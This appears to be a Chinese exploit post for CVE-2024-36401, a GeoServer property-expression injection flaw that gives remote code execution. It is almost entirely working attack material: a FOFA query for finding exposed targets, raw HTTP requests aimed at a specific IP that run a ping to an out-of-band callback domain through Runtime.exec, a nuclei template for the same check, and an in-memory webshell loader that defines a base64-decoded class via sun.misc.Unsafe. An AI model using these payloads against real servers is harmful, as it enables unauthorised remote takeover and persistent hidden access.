GeoServer property 表达式注入【附内存马poc】

fofa：app="GeoServer"

POST /geoserver/wfs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Connection: closeHost: 163.172.180.129:8082Accept-Language: en-US;q=0.9,en;q=0.8Cache-Control: max-age=0Content-Type: application/xmlContent-Length: 356<wfs:GetPropertyValue service='WFS' version='2.0.0'xmlns:topp='http://www.openplans.org/topp'xmlns:fes='http://www.opengis.net/fes/2.0'xmlns:wfs='http://www.opengis.net/wfs/2.0'>  <wfs:Query typeNames='sf:archsites'/>  <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')</wfs:valueReference></wfs:GetPropertyValue>

id: GeoServer_property_RCEinfo:  name: GeoServer_property_RCE  author: hamal  severity: high  description: GeoServer property 表达式注入代码执行漏洞（CVE-2024-36401）  reference:    - https://  tags: 微信公众号（实战安全研究）http:  - raw:      - |-        POST /geoserver/wfs HTTP/1.1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36        Accept-Encoding: gzip, deflate, br        Accept: */*        Connection: close        Host: {{Hostname}}        Accept-Language: en-US;q=0.9,en;q=0.8        Cache-Control: max-age=0        Content-Type: application/xml        Content-Length: 356        <wfs:GetPropertyValue service='WFS' version='2.0.0'        xmlns:topp='http://www.openplans.org/topp'        xmlns:fes='http://www.opengis.net/fes/2.0'        xmlns:wfs='http://www.opengis.net/wfs/2.0'>          <wfs:Query typeNames='sf:archsites'/>          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'ping wsn9.callback.red')</wfs:valueReference>        </wfs:GetPropertyValue>    matchers-condition: and    matchers:      - type: word        part: body        words:          - java.lang.ClassCastException

POST /geoserver/wfs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Connection: closeHost: 163.172.180.129:8082Accept-Language: en-US;q=0.9,en;q=0.8Cache-Control: max-age=0Content-Type: application/xmlContent-Length: 20383<wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'>  <wfs:Query typeNames='sf:archsites'/>  <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'var str="内存马poc";var bt;try {    bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);} catch (e) {    bt = java.util.Base64.getDecoder().decode(str);}var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");theUnsafe.setAccessible(true);unsafe = theUnsafe.get(null);unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();')</wfs:valueReference></wfs:GetPropertyValue>